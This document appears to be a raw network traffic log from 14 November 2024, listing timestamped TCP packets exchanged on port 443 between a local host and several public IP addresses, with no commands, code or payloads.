                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.882617950 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.884076118 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.884159088 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.884433031 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.884538889 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.884557009 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.927335024 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.936255932 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.936265945 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.981611967 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.041547060 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.041876078 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.041928053 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.108808994 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.108973980 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.109113932 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.109126091 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.109380007 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.110450983 CET49771443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.110469103 CET44349771152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.113625050 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:48.113646030 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:25.735354900 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:25.735393047 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:25.735441923 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:25.736865997 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:25.736877918 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.486788034 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.487054110 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.492665052 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.492691994 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.493217945 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.507484913 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.555334091 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.724533081 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.724594116 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.724685907 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.724725962 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.724755049 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.724778891 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.724802017 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.755779028 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.755831957 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.755871058 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.755903959 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.755928040 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.756234884 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.843200922 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.843261957 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.843357086 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.843465090 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.843497038 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.843594074 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.874186993 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.874243975 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.874383926 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.874383926 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.874403954 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.874547005 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.875935078 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.875986099 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.876017094 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.876029968 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.876048088 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.876224041 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.877583981 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.877640963 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.877674103 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.877681971 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.877707005 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.877748013 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.980623960 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.980686903 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.980727911 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.980751991 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.980779886 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.980988979 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.992042065 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.992084980 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.992122889 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.992137909 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.992170095 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.992379904 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.993025064 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.993065119 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.993100882 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.993105888 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.993135929 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.993172884 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.994324923 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.994371891 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.994407892 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.994412899 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.994441986 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.994524002 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.995501995 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.995546103 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.995584011 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.995588064 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.995610952 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.995744944 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.996282101 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.996324062 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.996357918 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.996365070 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.996388912 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.996422052 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.997232914 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.997283936 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.997320890 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.997325897 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.997350931 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:26.997385979 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.099046946 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.099200010 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.099224091 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.099292040 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.099503040 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.099518061 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.099550962 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.099556923 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.192621946 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.192672968 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.192734957 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.192926884 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.192981005 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.193032980 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.194638968 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.194681883 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.194737911 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.196949005 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.196960926 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.197021961 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.197961092 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.198000908 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.198151112 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.198165894 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.198508978 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.198535919 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.198775053 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.198791981 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.199842930 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.199855089 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.199896097 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.200398922 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.200412035 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.922370911 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.923372984 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.923398972 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.924392939 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.924396038 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.928009033 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.928781986 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.928817987 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.929306984 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.929835081 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.929843903 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.930382967 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.930401087 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.931658983 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.931664944 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.936233997 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.937096119 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.937124968 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.938014984 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.938019037 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.946105003 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.946717978 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.946724892 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.947593927 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:27.947597980 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.058679104 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.058830976 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.058888912 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059490919 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059521914 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059576988 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059608936 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059648037 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059647083 CET49786443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059684992 CET4434978613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059711933 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.059712887 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.064260006 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.064265966 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.064279079 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.064285040 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.072576046 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.072654009 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.072726011 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.073582888 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.073617935 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.075151920 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.075191021 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.075253010 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.075489044 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.075500011 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.076075077 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.076374054 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.076425076 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.079122066 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.079142094 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.079185963 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.079196930 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.079646111 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.079698086 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.112756014 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.112781048 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.112792015 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.112797022 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.116381884 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.116384983 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.124006987 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.124102116 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.124192953 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.124620914 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.124635935 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.124667883 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.124682903 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.124706030 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.126240969 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.126257896 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258538961 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258553982 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258615017 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258619070 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258677959 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258897066 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258919954 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258948088 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.258954048 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.261794090 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.261850119 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.262101889 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.262101889 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.262181997 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.815671921 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.816225052 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.816268921 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.816751957 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.816759109 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.846808910 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.847976923 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.847976923 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.848005056 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.848020077 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.861912012 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.862684011 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.862684011 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.862705946 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.862730980 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.882606983 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.883002996 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.883064985 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.883402109 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.883416891 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.949790001 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.949889898 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.950084925 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.950084925 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.950084925 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.952545881 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.952611923 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.952801943 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.952801943 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.952837944 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.990755081 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.990916014 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.991059065 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.991059065 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.991059065 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.993516922 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.993619919 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.993858099 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:28.993858099 CET49794443192.168.2.413.107.246.45
